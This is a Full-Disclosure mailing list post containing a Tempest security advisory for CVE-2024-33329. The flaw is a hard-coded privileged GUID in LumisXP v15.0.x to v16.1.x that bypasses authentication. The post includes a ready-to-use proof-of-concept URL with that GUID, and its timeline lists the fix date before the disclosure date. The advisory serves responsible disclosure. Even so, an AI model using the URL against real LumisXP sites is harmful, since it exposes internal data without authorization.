lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAFOz53frwhk=3oMa3zQ0P2kZLRaTJWFVcJ8-NA3JremE=vTSdg@mail.gmail.com>
Date: Tue, 9 Jul 2024 16:54:20 -0300
From: Rodolfo Tavares via Fulldisclosure <fulldisclosure@...lists.org>
To: fulldisclosure@...lists.org
Subject: [FD] CVE-2024-33329

=====[ Tempest Security Intelligence - ADV-6/2024
]==========================

LumisXP v15.0.x to v16.1.x

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================

Overview
Detailed description
Timeline of disclosure
Thanks & Acknowledgements
References
=====[ Vulnerability
Information]=============================================

Class: Use of Hard-coded Credentials
('Use of Hard-coded Credentials') [CWE-798]
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - 5.3
=====[ Overview]========================================================

System affected : LumisXP
Software Version : Version - v15.0.x to v16.1.x
Impacts :
Vulnerability: A hardcoded privileged ID within Lumisxp v15.0.x to v16.1.x
allows attackers to bypass authentication and access internal pages and
other sensitive information
=====[ Detailed
description]=================================================

IDOR
http://localhost.com/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=
:
Access the link by inserting the GUID into the lumChannelId= parameter.
1 - Access your target using the following GUID (
00000000F00000000000000000000002 )
```
http://localhost.com/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=
```
2 - Verify that in the request response you will have access to various
component information and internal information about one or several domains.

=====[ Timeline of
disclosure]===============================================

2/Apr/2024 - Responsible disclosure was initiated with the vendor.
12/Apr/2024 - LumisXP Support confirmed the issue;
16/Fev/2024 - The vendor fixed the vulnerability
29/May/2024 - CVEs was assigned and reserved as CVE-2024-33329

=====[ Thanks & Acknowledgements]========================================

Tempest Security Intelligence [1]
Rodolfo Tavares
Niklas Correa
=====[ References ]=====================================================

[1][ https://cwe.mitre.org/data/definitions/798.html
[2][ https://www.tempest.com.br]
[3][Thanks Filipe X.]

=====[ EOF ]===========================================================

--

-- 

*Esta mensagem é para uso exclusivo de seu destinatário e pode conter 
informações privilegiadas e confidenciais. Todas as informações aqui 
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a 
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é 
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste 
caso, por favor, notifique o remetente da mesma e destrua imediatamente a 
mensagem.*

*
*
*This message is intended solely for the use of its 
addressee and may contain privileged or confidential information. All 
information contained herein shall be treated as confidential and shall not 
be disclosed to any third party without Tempest’s prior written approval. 
If you are not the addressee you should not distribute, copy or file this 
message. In this case, please notify the sender and destroy its contents 
immediately.**
*
*
*
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ